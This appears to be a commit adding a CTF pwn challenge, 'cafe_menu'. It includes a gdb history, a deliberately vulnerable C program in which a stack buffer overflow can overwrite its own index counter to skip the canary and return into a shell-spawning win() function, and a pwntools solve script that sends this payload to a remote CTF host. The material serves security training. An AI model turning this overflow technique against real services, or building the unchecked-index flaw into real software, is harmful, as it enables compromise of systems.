Second CTFs part

canary/05_cafe_menu/.gdb_history

@@ -0,0 +1,7 @@
+disass vuln
+b *0x0000000000401355
+r
+bkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
+quit
+disass vuln
+quit

canary/05_cafe_menu/main.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Chef's special unlocked!");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void vuln(void) {
+    struct {
+        char menu[48];
+        volatile unsigned int idx;
+    } data;
+
+    data.idx = 0;
+
+    printf("Enter today's specials (send 0xff to finish):\n");
+
+    while (data.idx < 200) {
+        char c;
+        if (read(STDIN_FILENO, &c, 1) != 1) break;
+        if ((unsigned char)c == 0xff) break;
+        data.menu[data.idx] = c;
+        data.idx++;
+    }
+
+    printf("Menu updated!\n");
+}
+
+int main(void) {
+    setup();
+    printf("Welcome to the Cafe!\n");
+    vuln();
+    return 0;
+}

canary/05_cafe_menu/solve.py

@@ -0,0 +1,22 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./cafe_menu", checksec=False)
+
+BUF_LEN = 48
+# CANARY_OFF = 50
+AFTER_CANARY = 0x3F
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13563)
+print(p.recvline())
+# We can overwrite IDX to make it write on the stack after the canary position
+payload = flat(
+    b"A" * 48,
+    b"\x3f",  # After canary offset found
+    b"A" * 8,  # Skip rbp
+    p64(0x401262),  # win
+    b"\xff",
+)
+p.send(payload)
+print(p.recvline())
+p.interactive()